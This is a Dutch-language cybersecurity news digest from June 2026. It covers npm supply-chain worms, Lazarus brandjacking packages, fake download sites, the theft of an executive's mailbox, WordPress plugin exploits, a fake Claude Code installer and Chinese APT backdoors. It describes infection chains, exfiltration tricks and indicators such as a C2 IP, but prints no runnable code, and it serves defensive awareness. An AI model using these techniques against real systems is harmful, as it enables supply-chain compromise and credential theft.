Onderzoekers van JFrog, een bedrijf gespecialiseerd in supply chain en devops, meldden dat IronWorm zich verbergt achter een eBPF kernel rootkit en communiceert met de operator via het netwerk van Tor. De Rust-gebaseerde malware verspreidt zichzelf door gestolen referenties te gebruiken voor publicatie op npm, inclusief geheimen die zijn gekoppeld aan npm's Trusted Publishing workflow. Zodra een ontwikkelaar of CI-omgeving is gecompromitteerd, kan de malware getrojaniseerde versies van pakketten publiceren die eigendom zijn van het slachtoffer, waardoor vervolgens extra ontwikkelaars en CI-systemen worden geïnfecteerd.
Dit gedrag vertoont conceptuele overeenkomsten met Shai Hulud, waarvan de code onlangs op GitHub werd gepubliceerd. Hoewel JFrog-onderzoekers geen duidelijke connectie vonden tussen IronWorm en Shai Hulud, observeerden ze wel dezelfde commit-namen in beide supply-chain aanvallen. Dit opent de mogelijkheid dat de nieuwe malware een evolutie is van de payload van TeamPCP, aangezien IronWorm een "op maat gemaakt, zorgvuldig gebouwd implantaat van een operatie met eigen infrastructuur" lijkt te zijn.
Volgens JFrog begon de recente aanval vanuit een gecompromitteerd account genaamd 'asteroiddao', dat pakketversies publiceerde die een Rust ELF-binary bevatten, uitgevoerd via 'preinstall'. Malafide commits werden vervolgens in repositories gepusht. De auteur van de commits verschijnt als "claude", en de tijdstempels wijzen op enkele jaren geleden, in sommige gevallen zelfs tot 13 jaar, hoewel ze pas de afgelopen dagen zijn gepusht. Dit is waarschijnlijk bedoeld om onderzoek te omzeilen.
Een opmerkelijk element in de bevindingen van JFrog is een mechanisme dat afhankelijk is van GitHub Actions om de gestolen geheimen te leveren. JFrog legt uit dat de malware de geheimen serialiseert tot één enkele waarde en deze vervolgens "wegschrijft naar een onschuldig ogend bestand, alsof het lint- of formatteringsoutput betreft". De laatste stap van het proces is het uploaden van het bestand als een build-artefact, dat door iedereen met toegang kan worden gedownload. Op deze manier kan de dreigingsactor een externe command-and-control (C2) volledig vermijden. De onderzoekers merken echter op dat dit leveringsmechanisme niet is gebruikt in de geanalyseerde IronWorm supply-chain aanval.
Een andere bijzonderheid is dat de operator de herstelzin van zijn eigen cryptocurrency wallet had vastgelegd in de code. De onderzoekers stellen dat de enige reden hiervoor is dat de dreigingsactor niet wilde dat de malware deze zou stelen tijdens de testfase.
Het applicatiebeveiligingsbedrijf Ox Security meldde dat de IronWorm-aanval zeer vroeg werd gedetecteerd en gestopt voordat deze zich kon verspreiden naar populairdere pakketten op npm. Het bedrijf heeft een lijst gepubliceerd van alle getroffen pakketnamen en hun versies, en adviseert ontwikkelaars om te upgraden naar gefixte releases, hun sleutels te roteren en twee-factor authenticatie (2FA) in te schakelen voor alle accounts. Tegelijkertijd hebben Endor Labs en StepSecurity een zeer vergelijkbare, maar afzonderlijke aanval waargenomen met JavaScript-gebaseerde malware genaamd binding.gyp, die registry poisoning en GitHub Actions-infectie uitvoerde in hetzelfde tijdsbestek.
Bron: JFrog | Bron 2: ox.security | Bron 3: endorlabs.com
05 juni 2026 | Forumdraad onthult handleiding voor monetarisatie van kwetsbaarheden
Een recente discussie op een ondergronds forum, getiteld "Hacking for Profit. Working method", biedt een zeldzame inkijk in de manier waarop cybercriminelen informatie over de exploitatie van kwetsbaarheden en hacktechnieken delen. De post, geschreven door een actor genaamd "Hercules", is niet bijzonder lang of technisch, maar blinkt uit in het opdelen van een complex proces in duidelijke, uitvoerbare stappen. Het behandelt het scannen, detecteren, beoordelen, exploiteren en te gelde maken van kwetsbaarheden, en geeft inzicht in de betekenis van vulnerability disclosure programma’s.
Onderzoekers van Flare analyseerden de originele post en de reacties daarop gedurende enkele maanden. De activiteit rondom de draad toonde aan dat de invloed ervan verder reikte dan de initiële publicatie. Meerdere gebruikers bedankten "Hercules", vroegen om privécontact, identificeerden zichzelf als beginners of gaven aan begeleiding te zoeken om van theoretische kennis naar praktische hacking over te stappen. Het succes van de post was zo groot dat de methode werd herplaatst en besproken op vier extra forums, wat aantoont hoe "Hercules" beginnende dreigingsactoren een eenvoudig raamwerk biedt voor het begrijpen van de exploitatie van kwetsbaarheden en het verdienen van geld hiermee.
De handleiding van "Hercules" legt uit hoe een ontdekte kwetsbaarheid te gelde kan worden gemaakt. Het begint met advies over het zoeken naar recentelijk openbaar gemaakte kwetsbaarheden, met name kwetsbaarheidsklassen met een grote impact, zoals remote code execution, authenticatie bypass, accountovername, IDOR (Insecure Direct Object Reference) en data-expositie. Vervolgens wordt ingegaan op het identificeren van blootgestelde systemen, het valideren of deze systemen kwetsbaar zijn, en het beslissen of de resultaten moeten worden gerapporteerd, verkocht of geëxploiteerd.
Drie aspecten vallen op in de handleiding van de dreigingsactor: het gebruik van het Nuclei framework van projectdiscovery.io, een populaire tool onder offensive security professionals; het inzicht in de uitdagingen waarmee verdedigers worden geconfronteerd bij het patchen van nieuw ontdekte kwetsbaarheden; en de verdeling van de handleiding in een "legale" en een "illegale" sectie. Dit betekent dat lezers in elke fase kunnen beslissen om van kwetsbaarheidsmelding over te stappen op hacking.
Het meest effectieve deel van de handleiding is niet een technische truc, maar de toon. "Hercules" schrijft in duidelijke taal en presenteert het proces als iets dat door actie kan worden geleerd. Hij stelt dat veel tutorials zich te veel richten op computerwetenschappen, besturingssystemen, programmeren of scannerparameters, terwijl beginners willen "hacken", "inbreken" en "toegang krijgen". Hij suggereert ook dat gebruikers geen geavanceerde software engineers hoeven te zijn om te beginnen. Publieke tools, community templates, automatisering en zelfs assistentie van AI worden gepresenteerd als manieren om de drempel te verlagen, terwijl programmeervaardigheden als nuttig maar niet verplicht worden beschreven. De onderliggende boodschap is simpel: de technische kloof is kleiner dan beginners denken. Deze boodschap verklaart een groot deel van de forumreacties, waarin gebruikers aangaven ondanks vele cursussen nog niet praktisch te kunnen hacken, of vroegen of gebrek aan programmeerkennis een probleem zou zijn. De handleiding nodigt lezers uit contact op te nemen voor verdere begeleiding.
Bron: Flare | Bron 2: projectdiscovery.io | Bron 3: aquasec.com
05 juni 2026 | NCSC adviseert ontwikkelaars tegen automatische installatie van softwarepakketten
Het Britse National Cyber Security Centre (NCSC) heeft softwareontwikkelaars geadviseerd om packages en andere updates van afhankelijkheden niet langer automatisch te installeren. In plaats daarvan dienen deze eerst handmatig te worden gecontroleerd. Dit advies volgt op een eerdere aanbeveling van het Amerikaanse cyberagentschap CISA, dat ontwikkelaars opriep om minstens drie uur te wachten met de installatie van nieuwe packages. De aanleiding voor deze waarschuwingen zijn de toegenomen aanvallen op software supply chains waarmee veel organisaties recentelijk te maken hebben gehad.
De afgelopen weken is gebleken dat aanvallers diverse packages op platforms zoals GitHub, npm of de Python Package Index (PyPI) hebben voorzien van malware. Softwareontwikkelaars die voor hun projecten gebruikmaken van deze packages en de geïnfecteerde versies installeerden, raakten hierdoor zelf geïnfecteerd. De malware was vervolgens in staat om inloggegevens, tokens, keys en andere credentials van deze ontwikkelaars te stelen. Hierdoor konden ook hun softwareprojecten worden geïnfecteerd, wat een breed risico vormt voor de uiteindelijke gebruikers van de software.
Het Britse NCSC benadrukt dat softwareontwikkelaars direct een aantal concrete maatregelen kunnen treffen om de risico's te beperken. Een van de belangrijkste aanbevelingen is het handmatig controleren van alle nieuwe updates, afhankelijkheden en versies voordat deze worden geïmplementeerd. Daarnaast adviseert de Britse overheidsdienst om in het geval van een vermoedelijke aanval op de supply chain de automatische updates van afhankelijkheden te pauzeren. Het is tevens essentieel dat ontwikkelaars een duidelijk overzicht hebben van alle afhankelijkheden die binnen hun projecten worden gebruikt. Tot slot wordt aangeraden om een evenwicht te vinden tussen het snel installeren van beveiligingspatches en het langzamer updaten van externe afhankelijkheden, om zo de potentiële impact van een succesvolle aanval te minimaliseren. Dit strategische uitstel kan cruciale tijd bieden voor het detecteren en mitigeren van besmette updates.
Bron: NCSC
05 juni 2026 | Lazarus Group gebruikt npm brandjacking om ontwikkelaars te targeten
De Lazarus Group uit Noord-Korea heeft een nieuwe npm-campagne gelanceerd die zich richt op ontwikkelaars. Deze campagne maakt gebruik van misleidende pakketnamen om toegang te verkrijgen tot de systemen en software build-omgevingen van ontwikkelaars. Sonatype Security Research volgt tientallen kwaadaardige npm-pakketten die aan deze campagne gekoppeld zijn. Sommige van deze pakketten bereikten tot wel 500 wekelijkse downloads. De pakketten zijn zo ontworpen dat ze gerelateerd lijken aan vertrouwde JavaScript-projecten en tools, wat de kans vergroot dat ontwikkelaars ze installeren tijdens hun normale werkzaamheden.
In tegenstelling tot de gebruikelijke typosquatting-technieken, waarbij hackers misbruik maken van spelfouten, vond Sonatype dat in dit geval brandjacking-methoden werden toegepast. Dit omvat onder andere de toevoeging van achtervoegsels, het inbedden van projectnamen en het nabootsen van versienummers. Onderzoekers zagen voorbeelden van namen die waren opgebouwd rond bekende projecten zoals Buffer, Chai, React, Express, JWT en Webpack. Deze naamgevingsstrategie is effectiever voor aanvallers, omdat npm veel kleine hulpbibliotheken, wrappers en plugins bevat. Een pakket genaamd `buffer-utilities`, bijvoorbeeld, kan een legitieme aanvulling lijken op het veelgebruikte buffer-pakket, zelfs als er geen echte verbinding is met het project.
De analyse van Sonatype van `buffer-utilities` toonde aan dat het pakket gekopieerde code van de echte buffer-bibliotheek bevatte, maar ook functioneerde als een kwaadaardige dropper. Na installatie decodeerde het Base64-gecodeerde URL's, haalde het externe inhoud op van `www.jsonkeeper.com` en voerde het de opgehaalde code uit met `eval()`. Onderzoekers stelden vast dat dit patroon ook in andere pakketten, die aan dezelfde Lazarus-activiteit zijn gekoppeld, voorkwam. Het gebruik van `www.jsonkeeper.com` is eveneens opmerkelijk, aangezien Sonatype Lazarus eerder heeft waargenomen bij het hosten van payloads via deze service.
Nadat de eerste fase is uitgevoerd, kan de malware een Node.js-backdoor en downloader installeren. Deze payload verzamelt basis systeemdetails, waaronder de hostnaam, gebruikersnaam, besturingssysteem, home-directory en procesargumenten. Vervolgens maakt het contact met de command and control-infrastructuur om verdere instructies te ontvangen. De malware kan ook een verborgen .vscode-directory aanmaken in de home-map van de gebruiker, meer bestanden downloaden en door de aanvaller beheerde JavaScript als een losgekoppeld achtergrondproces starten. Sonatype meldde dat het pakket een payload van de derde fase, genaamd `f.js`, kan ophalen, samen met een `package.json-bestand`, waarna het `npm install --silent` uitvoert voordat de payload wordt gestart. Dit gedrag stelt de aanvaller in staat om toegang te behouden en kwaadaardige bestanden over tijd te vernieuwen. Sonatype rapporteerde ook een updatemechanisme dat de payload in staat stelt opnieuw verbinding te maken met command and control-servers, te controleren op nieuwere versies en lokale bestanden te vervangen.
De campagne toont aan waarom npm aantrekkelijk blijft voor geavanceerde dreigingsactoren. Ontwikkelaars installeren vaak pakketten op basis van naamsbekendheid, projectgeschiktheid of gemak, vooral in JavaScript-omgevingen waar kleine afhankelijkheden veelvoorkomend zijn. De link met de Lazarus Group geeft gewicht aan de bevindingen. Hoewel de groep vaak wordt geassocieerd met financiële diefstal en spionageoperaties van hoog profiel, toont deze activiteit de interesse van de groep in machines van ontwikkelaars, inloggegevens, build-systemen en langdurige toegang tot bedrijfsomgevingen.
Organisaties die `buffer-utilities` versie 1.0.0 of pakketten die geassocieerd zijn met Sonatype-identificatie `sonatype-2026-003558` hebben geïnstalleerd, moeten deze verwijderen en de getroffen systemen controleren op tekenen van verdere compromittering. Sonatype waarschuwde dat verwijdering alleen mogelijk niet voldoende is als latere payloads al zijn uitgevoerd. Beheerders moeten ook controleren op netwerkverbindingen met `www.jsonkeeper.com`, command and control-verkeer naar `45.59.163.198:1244`, onverwachte .vscode-mappen in home-directories van gebruikers, ongebruikelijke Node.js-processen en onverklaarde toegang tot inloggegevens vanaf werkstations van ontwikkelaars of build-systemen.
Bron: Sonatype
05 juni 2026 | Grootschalige malwarecampagne misbruikt nagemaakte open source websites en TDS
Cybersecurity onderzoekers hebben een grootschalige operatie blootgelegd die legitieme open source en freeware projecten nabootst. Het doel is om onwetende gebruikers via een Traffic Distribution System (TDS) naar kwaadaardige software te leiden, waaronder de Remus Stealer, AnimateClipper en het SessionGate framework.
Alexey Bukhteyev, security onderzoeker bij Check Point, legt uit dat "de websites goed zijn ontworpen en bij een snelle blik vaak legitieme projectportalen lijken, soms zelfs verwijzend naar echte bronnen. De misleiding zit niet alleen in de inhoud van de pagina, maar vooral in wat er gebeurt wanneer een gebruiker interactie heeft."
Deze nagemaakte pagina’s laden een via CloudFront gehoste JavaScript staging laag. Deze laag zet een klik op een download knop of link om in een doorverwijzing naar een TDS. Het TDS hanteert strikte controlemechanismen, waaronder de status van het eerste bezoek, verplichte klikbevestiging, anti-bot en anti-analyse logica, VPN en datacenter filtering, en frequentielimieten.
Men vermoedt dat de operatie is gericht op het verwerven en monetariseren van verkeer, waarbij geselecteerde gebruikers naar infrastructuur voor malware distributie worden geleid. Enkele van de geïdentificeerde websites imiteren betrouwbare reverse-engineering en security tools zoals Ghidra, dnSpy en SpiderFoot.
De aanvalsketens richten zich specifiek op gebruikers die via zoekmachines zoals Google naar dergelijke tools zoeken. Hierdoor verschijnen de nagemaakte websites bovenaan de zoekresultaten. Een eerdere versie van de campagne werd in november 2025 door Fullstory gedocumenteerd. Bewijs toont aan dat de activiteit al sinds september 2025 gaande is.
Het in Atlanta gevestigde bedrijf merkte destijds op dat "deze domeinen gericht zijn op het verkrijgen van gunstige zoekmachineposities door gebruik te maken van de naam, het merk en de populariteit van de originele websites en projecten." Veel websites staan bovenaan de zoekresultaten op Google voor de relevante zoekterm, vaak hoger dan de echte projectwebsite, wat hun zichtbaarheid maximaliseert en kan leiden tot meer links en inhoud.
Hoewel er aanvankelijk geen aanwijzingen waren voor kwaadaardige activiteiten anders dan het genereren van inhoud om verkeer aan te trekken en derden in staat te stellen hun eigen websites te adverteren, tonen de nieuwste bevindingen van Check Point aan dat de TDS scripts niet lang daarna werden ingesloten. De infrastructuur werd vanaf januari 2026 omgevormd voor de distributie van malware.
Een klik op de "Download" knop initieert een TDS omleidingsketen die resulteert in de implementatie van malware. Een opvallend aspect is dat bij het zweven over de knop de legitieme URL zichtbaar wordt van waar de tool kan worden gedownload, wat de website een schijn van legitimiteit geeft.
De omleidingsketens zijn ook zo ontworpen dat herhaalde pogingen om de site te bezoeken vanaf hetzelfde IP-adres resulteren in de download van goedaardige software, zoals de Opera browser of onnodige browser extensies. Enkele van de payloads die via dit TDS worden verspreid, zijn:
* **SessionGate:** Een voorheen onbekende multi-stage, versluierde loader die wordt gebruikt om potentieel ongewenste applicaties (PUA) te leveren. Het bevat uitgebreide anti-analyse mechanismen om sandboxes te misleiden door over te schakelen naar een goedaardige installatie ervaring.
* **Remus Stealer:** Een nieuwe informatie stealer, aangeboden onder een malware als een service (MaaS) model. Deze kan data stelen van meer dan 20 browsers, inclusief honderden browser extensies en applicaties, zoals cryptocurrency wallets, twee factor authenticatie tools en wachtwoordmanagers. Remus wordt beschouwd als een variant van de Lumma Stealer.
* **AnimateClipper:** Een cryptocurrency clipper die gekopieerde wallet adressen in het klembord kan vervangen en transacties kan kapen over meer dan 20 blockchain ecosystemen. Het wordt geleverd via een ClickFix lokmiddel.
Een analyse van VirusTotal telemetrie heeft tot op heden ongeveer 2.000 tot 3.500 inzendingen van samples geassocieerd met de SessionGate familie onthuld. Het merendeel van deze inzendingen kwam uit Turkije, Polen, Brazilië, Duitsland, Frankrijk, Rusland en het Verenigd Koninkrijk.
Het uiteindelijke doel van de SessionGate infectieketen is het droppen van een payload die uniek is per client en pas wordt geleverd na het volledig doorlopen van het omleidingspad. De multi-stage leveringsketen, gecombineerd met uitgebreide validatie logica en TDS-gerelateerde gating, is ontworpen om analyse te weerstaan en het ophalen van de payload voor analisten een uitdagende taak te maken. De uiteindelijke DLL payload is verantwoordelijk voor communicatie met een externe server, het ophalen van een versleutelde configuratie van de server, het extraheren van de download URL uit de configuratie, en het downloaden en stil uitvoeren van de volgende fase malware via "cmd.exe."
Bukhteyev concludeert: "De toegangssites imiteren legitieme open source project portals, bewaren echte GitHub links om snelle visuele controles te doorstaan, en gebruiken vervolgens klik onderschepping om de eerste download klik om te leiden naar een afgeschermde TDS stack." Hij voegt eraan toe: "Het meest aannemelijke primaire doel is verkeersacquisitie en monetarisatie. Echter, door een afgeschermde TDS laag in te bedden en zoekverkeer ernaartoe te leiden, worden de operators onderdeel van een distributieketen waarvan de downstream consumenten malware distributeurs kunnen zijn. Dezelfde verkeerspijplijn die grijze monetarisatie aanstuurt, kan ook selectief echte gebruikers naar kwaadaardige payloads leiden."
Bron: Check Point
05 juni 2026 | Hackers bespioneren Outlook mailbox beursdirecteur maandenlang
Onbekende aanvallers hebben ten minste vijf maanden lang toegang gehad tot de Outlook mailbox van een hooggeplaatste directeur bij een grote wereldwijde beurs. Gedurende deze periode kopieerden de aanvallers de inhoud van de mailbox in kleine, herhaalde batches en leidden deze data via Dropbox en OneDrive om de activiteit te laten opgaan in normaal cloudverkeer.
Symantec en Carbon Black's Threat Hunter Team rapporteerden deze campagne deze week. De aard van de commando's duidt op spionage en verzameling van inlichtingen, in plaats van diefstal voor financieel gewin. De namen van de directeur en de beurs zijn niet bekendgemaakt. De waarde van dergelijke informatie is echter duidelijk: de inbox van een beursdirecteur kan niet-openbare noteringsdetails, handhavingskwesties, dealvoorwaarden, marktverplaatsende plannen, evenals de agenda en contacten van de directeur bevatten. Vijf maanden onopgemerkte toegang gaf de aanvaller een gedetailleerd inzicht in de activiteiten van de directeur en de toekomstige richting van de organisatie, zonder dat brede toegang tot andere bedrijfssystemen nodig was.
De eerste kwaadaardige activiteit werd waargenomen op 10 oktober 2025. Op dat moment voerde de aanvaller al twee binaire bestanden uit als SYSTEM, het hoogste Windows-privilegeniveau. Eén van deze bestanden deed zich voor als een Adobe updater en de andere als OneDrive. Tegen de tijd dat verdedigers iets opmerkten, had de indringer volledige controle over de machine, en de initiële toegangsmethode blijft onbekend. Symantec bevestigde echter dat de eerste tekenen waarschijnlijk afkomstig waren van laterale beweging vanaf een eerder gecompromitteerd apparaat.
De operatie kwam op 12 november in een hogere versnelling. De aanvaller verkreeg een Dropbox API token, begon data te uploaden met `curl`, en zette de hoofdgereedschap in: een mailbox stealer gebouwd op Aspose, een legitieme .NET bibliotheek die Outlook OST- en PST-bestanden leest. Dit gereedschap, verpakt in een uitvoerbaar bestand, converteerde de mailbox naar PST-formaat en schreef deze naar schijf, telkens uitgevoerd met een wachtwoord en een vlag voor het datumbereik. De eerste run omvatte alle data vanaf augustus 2025. Daarna keerde de aanvaller elke twee tot vier weken terug, waarbij elke run alleen de data sinds de vorige keer verzamelde. Dit gebeurde nog acht keer tot 17 februari 2026, wat resulteerde in een bijna continue kopie van de mailbox, opgesplitst in kleine genoeg delen om geen aandacht te trekken van beveiligingssoftware.
De stealth werd bereikt door de activiteiten er alledaags uit te laten zien. Geplande taken deden zich voor als systeem services van Adobe, Lenovo en OneDrive. Voor exfiltratie gebruikte de aanvaller Dropbox en OneDrive Personal. Voor OneDrive maakten ze verbinding met hardgecodeerde Microsoft IP-adressen in plaats van de onedrive.live.com hostname, zodat er geen DNS-zoekopdrachten waren die perimeter beveiligingssystemen konden detecteren of blokkeren. De aanvaller testte ook de publieke bestandshost temp.sh in november, maar liet deze daarna vallen. De laatst waargenomen activiteit, op 19 maart 2026, was een nieuwe backdoor die wel was klaargezet maar nooit werd uitgevoerd, wat volgens Elias van Symantec kan betekenen dat de aanvaller kort daarna de toegang verloor.
Symantec's gepubliceerde indicatoren wijzen op een bredere inbraakkit, niet alleen een mailbox grabber: FRPC voor het tunnelen van verkeer naar buiten, Secretsdump voor het ophalen van Windows credentials, SharpDecryptPwd voor het herstellen van opgeslagen app-wachtwoorden, en een tool om Windows User Account Control te omzeilen. Het rapport specificeert niet hoe elk van deze tools in dit specifieke geval werd gebruikt, en geen van hen wijst op een specifieke groep. Er is geen CVE in dit verhaal; het betrof een inbraak in een persoonlijke mailbox, niet de exploitatie van een recent onthulde kwetsbaarheid. Dit benadrukt waarom het incident belangrijk is: er is geen patch die dit dicht, en de verantwoordelijkheid verschuift naar monitoring en respons.
Attributie blijft onopgelost. De mix van publieke tools en consumenten cloud services liet weinig over om de activiteit te verbinden met een bekende actor, en dat blijft zo totdat een sterkere bron anders aangeeft. Exfiltratie via Dropbox en OneDrive om op te gaan in het normale verkeer is een bekende tactiek, en Microsoft heeft deze methode al eerder aangemerkt als een bewuste manier om perimeter verdedigingen te omzeilen en attributie te bemoeilijken. Organisaties die marktverplaatsende informatie beheren, doen er goed aan de hashes te controleren en te letten op ongebruikelijke mailbox exportactiviteit, vreemde Outlook-toegang, uploads naar persoonlijke Dropbox- of OneDrive-accounts, onverwachte tunneling, en het dumpen van credentials op systemen die gekoppeld zijn aan geprivilegieerde gebruikers.
Bron: Symantec en Carbon Black | Bron 2: security.com
05 juni 2026 | WordPress-sites aangevallen via lekken in Everest Forms Pro en Burst Statistics
Aanvallers maken momenteel actief misbruik van kwetsbaarheden in twee populaire WordPress-plug-ins: Everest Forms Pro en Burst Statistics. Deze beveiligingslekken stellen ongeauthenticeerde aanvallers in staat om administratoraccounts aan te maken, waardoor zij volledige controle over de getroffen websites kunnen verkrijgen.
Burst Statistics is een plug-in die door meer dan tweehonderdduizend websites wordt gebruikt om bezoekersinformatie te verzamelen. De ontwikkelaars omschrijven het als een privacyvriendelijk alternatief voor Google Analytics. Een kritieke kwetsbaarheid in de authenticatiefunctie van deze plug-in controleert onvoldoende of een opgegeven wachtwoord correct is. Dit betekent dat een aanvaller die de gebruikersnaam van een beheerder kent, in combinatie met een willekeurig wachtwoord, een nieuw admin account kan aanmaken. De ontwikkelaar heeft dit probleem op 12 mei verholpen met de release van versie 3.4.2. Echter, cybersecuritybedrijf Wordfence rapporteert dat aanvallers sinds 13 mei, de dag na de patch, actief misbruik maken van dit lek. De afgelopen weken zijn meer dan 110.000 aanvalspogingen waargenomen gericht op deze kwetsbaarheid.
De tweede plug-in, Everest Forms Pro, wordt gebruikt voor het ontwerpen van contactformulieren, nieuwsbrieven, quizzen en betaalformulieren. De kwetsbaarheid die actief wordt misbruikt, bevindt zich in de betaalde versie van de plug-in, die naar schatting op vierduizend websites actief is. Via dit lek kunnen ongeauthenticeerde aanvallers specifiek voorbereide waarden invoeren in een formulier van de WordPress-site. Dit maakt het mogelijk om PHP code uit te voeren op de onderliggende server. Ook bij aanvallen op Everest Forms Pro is het primaire doel van de aanvallers het creëren van een admin account. Wordfence heeft ongeveer dertigduizend aanvallen waargenomen die gericht waren op dit beveiligingslek. Websitebeheerders wordt geadviseerd om hun plug-ins zo snel mogelijk bij te werken naar de nieuwste versies om deze dreiging te mitigeren.
Bron: Wordfence
05 juni 2026 | Nep Claude Code-installatiepagina verspreidt fileless infostealer
Aanvallers maken gebruik van SEO-vergiftiging om valse installatiepagina’s van Anthropic’s Claude Code bovenaan in zoekresultaten te plaatsen, met als doel de verspreiding van malware. Deze gerichte aanpak viseert voornamelijk beginnende ontwikkelaars. De aanval maakt gebruik van de ClickFix social engineering techniek, waarbij het slachtoffer wordt misleid om een kwaadaardig MSHTA-commando uit te voeren via het Windows uitvoervenster.
De infectieketen begint met de inzet van een 6,7 MB groot polyglotbestand dat zowel MP3 als HTA is. Dit bestand is ontworpen om tijdens beveiligingsscans door te gaan voor afspeelbare audio, maar bevat een verborgen HTA-scriptblok. Na de uitvoering van het HTA-script volgen fileless PowerShell-stappen, waarna een reflectieve .NET infostealer wordt geladen. Deze infostealer draait volledig in het geheugen, zonder bestanden op schijf aan te maken.
De primaire functie van de infostealer is het stelen van inloggegevens die zijn opgeslagen in browser-opslag. Voor command and control (C2) communiceert de malware met Russische infrastructuur via diverse subdomeinen. Deze methode van aanval toont een toenemende verfijning in het omzeilen van traditionele beveiligingsmaatregelen door het ontbreken van persistente bestanden en het gebruik van legitiem ogende bestandsformaten.
Bron: Cybersecurity News
06 juni 2026 | Verdachte loginprompts op websites van Toshiba en Muji via gecompromitteerde polyfill[.]io
Techgigant Toshiba en retailer Muji hebben bezoekers gewaarschuwd voor verdachte aanmeldschermen die op hun websites verschenen en mogelijk inloggegevens konden verzamelen. Beide Japanse bedrijven adviseren gebruikers die hun accountgegevens hebben ingevoerd in deze authenticatieschermen, hun wachtwoorden onmiddellijk te wijzigen voor de betreffende dienst.
De loginprompts werden gegenereerd door de externe dienst gehost op polyfill[.]io. Dit domein introduceerde in 2024 al malafide code in scripts die via zijn Content Delivery Network (CDN) werden geleverd. Toshiba meldde in een korte communicatie: "We hebben bevestigd dat delen van onze website een aanmeldscherm kunnen weergeven zoals hieronder getoond. We werken momenteel aan het elimineren van dit scherm, maar als u het ziet, selecteer dan 'Annuleren' zonder enige informatie in te voeren."
De Japanse retailgigant Muji publiceerde eerder deze week een vergelijkbare waarschuwing. Muji stelt dat er op dit moment geen ongeautoriseerde toegang of informatielekkage is bevestigd, maar adviseert klanten desondanks voorzorgsmaatregelen te nemen. Zowel Toshiba als Muji hebben de problemen inmiddels opgelost en de dienst opgeschort.
Japanse media hebben eveneens gemeld dat Zojirushi, FiNC Technologies, Ishiyaku Publishers en het online uitgeversmerk Hobonichi door hetzelfde probleem werden getroffen. Beveiligingsonderzoeker Pasquale Pillitteri rapporteerde daarnaast dat ook Samsung Smart TV's en websites op 1 juni een loginprompt vertoonden.
De oorzaak van het probleem lijkt terug te voeren op een incident in 2024, toen het domein polyfill[.]io werd overgenomen door een Chinese entiteit. Deze entiteit voegde kwaadaardige scripts toe die destijds meer dan 100.000 websites troffen die de Polyfill-dienst gebruikten. Polyfill is een JavaScript CDN dat moderne websites compatibel maakt met oudere browsers door een compatibiliteitslaag te bieden voor niet-ondersteunde technologieën.
De oorspronkelijke code van Polyfill werd geleverd via een CDN op polyfill[.]io, maar het domein was niet in eigendom van de maker van het open source project, Andrew Betts. Toen het domein afliep, kon het door iedereen worden geclaimd. Betts reageerde destijds publiekelijk door website-eigenaren aan te raden de dienst van hun sites te verwijderen en lanceerde een nieuwe JavaScript CDN-dienst op polyfill.com, later gevestigd op polyfill.top.
Hoewel de deactivering van de dienst op polyfill[.]io de omleidingen stopte, zijn sommige sites die de dienst gebruikten er de afgelopen twee jaar niet in geslaagd om al hun pagina's op te schonen, waardoor restanten van de Polyfill-code achterbleven. Pillitteri meldt dat het polyfill[.]io-domein eind mei 2026 opnieuw actief werd en begon te reageren met HTTP 401 authenticatieverzoeken. Browsers van gebruikers die pagina's bezoeken, zoals die van Toshiba en Muji, interpreteren dit als een verzoek om een gebruikersnaam en wachtwoord, waarna een loginprompt wordt weergegeven.
Op dit moment is er geen indicatie dat de getroffen websites zijn gehackt of dat referenties die op deze malafide aanmeldschermen zijn ingevoerd, daadwerkelijk zijn gestolen. Gebruikers wordt echter ten zeerste aanbevolen voorzichtig te zijn met onverwachte authenticatieprompts en bij twijfel geen gegevens in te voeren.
Bron: Toshiba en Muji | Bron 2: global.toshiba | Bron 3: itmedia.co.jp
06 juni 2026 | Chinese APT UNC5221 zet nieuwe malware in voor langdurige toegang
Een Chinese spionagegroep, bekend als UNC5221 en ook getraceerd als VerdantBamboo, heeft nieuwe malware ingezet om langdurige toegang te behouden tot gecompromitteerde netwerken. De groep maakt misbruik van de Brickstorm backdoor en twee recent ontdekte malwarevarianten genaamd Plenet en AgentPSD om toegang te krijgen tot Microsoft 365 omgevingen.
Onderzoek naar een incident, uitgevoerd door Volexity, onthulde dat de dreigingsactor minstens achttien maanden vóór detectie al toegang had tot het netwerk van het slachtoffer. Bovendien bleek de managed services provider (MSP) van de getroffen organisatie eveneens te zijn gecompromitteerd. UNC5221 staat erom bekend sinds 2023 zero day kwetsbaarheden in edge apparaten te misbruiken.
De Brickstorm backdoor, door onderzoekers omschreven als een "geavanceerde malware implant", werd meer dan een jaar onopgemerkt gebruikt in de omgevingen van verschillende doelen in de Verenigde Staten, totdat de inbreuken rond maart 2025 werden ontdekt. De initiële versies van Brickstorm waren geschreven in Golang, waarna nieuwere varianten in Rust verschenen. Google documenteerde de activiteit van UNC5221 met deze backdoor in april 2024 en opnieuw in september 2025, waarbij aanvallen op juridische dienstverleners, software as a service providers, business process outsourcers en technologiebedrijven werden beschreven. CISA waarschuwde eerder al voor de inzet van Brickstorm door Chinese hackers tegen VMware vSphere servers, en Google rapporteerde recentelijk dat UNC6201 de malware gebruikte tegen Dell RecoverPoint for Virtual Machines.
Volexity ontdekte vorig jaar dat VerdantBamboo een Egnyte Storage Sync systeem had gecompromitteerd en hier periodiek toegang toe verkreeg via de web SSL VPN van het slachtoffer. Vanuit deze positie en met behulp van Brickstorm proxy functionaliteiten en gestolen inloggegevens, kreeg de dreigingsactor toegang tot de Microsoft 365 omgeving van de organisatie. De onderzoekers van Volexity achten het zeer waarschijnlijk dat dit gebeurde om op te gaan in legitiem netwerkverkeer en zo Conditional Access beleid te omzeilen dat anders toegang zou hebben voorkomen.
Later bleek dat de hackers minstens achttien maanden op het netwerk aanwezig waren geweest voordat ze werden gedetecteerd. Bovendien wist VerdantBamboo de organisatie opnieuw te compromitteren nadat de onderzoekers de herstelwerkzaamheden hadden voltooid. Tijdens deze tweede inbraak gebruikten de aanvallers gestolen inloggegevens om SSL VPN toegang op de firewall van het slachtoffer in te schakelen en te configureren. Vervolgens maakten ze verbinding met interne systemen en implementeerden ze aanvullende op maat gemaakte malware op een Synology NAS apparaat. Dit leidde tot een onderzoek bij de MSP van de klant, waar Volexity ontdekte dat VerdantBamboo een BSD variant van Brickstorm op een pfSense firewall had geplaatst. Deze firewall was, net als het Storage Sync systeem van de getroffen organisatie, minstens achttien maanden eerder gecompromitteerd. Volexity heeft een gemiddeld vertrouwen dat de aanvaller vanuit de MSP naar de omgeving van de slachtofferorganisatie is doorgedrongen. Brickstorm werd vervolgens ingezet op de Egnyte Storage Sync appliance van het slachtoffer en op een buiten gebruik gestelde Linux GroupWise e mailarchiefserver.
